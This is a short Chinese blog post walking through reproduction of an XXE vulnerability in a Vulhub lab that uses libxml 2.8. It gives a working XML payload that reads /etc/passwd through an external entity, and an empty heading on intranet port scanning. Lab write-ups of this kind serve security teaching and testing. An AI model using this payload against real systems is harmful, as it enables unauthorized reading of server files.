天道酬勤

【Vulhub】——XML外部实体注入漏洞(XXE)

漏洞介绍

见文章:XXE漏洞

环境搭建

Vulhub一键搭建

漏洞复现

libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。

本环境的libxml版本为2.8版本。

访问靶机:

可以看到libxml的版本为2.8版本,默认解析xml

我们现在对页面进行抓包,进行实体注入,Vulhub提供三个界面:

dom.phpSimpleXMLElement.phpsimplexml_load_string.php

任意文件读取

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>

内网端口扫描

 

赞(0) 打赏
未经允许不得转载:HackerGu‘s Blog » 【Vulhub】——XML外部实体注入漏洞(XXE)
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏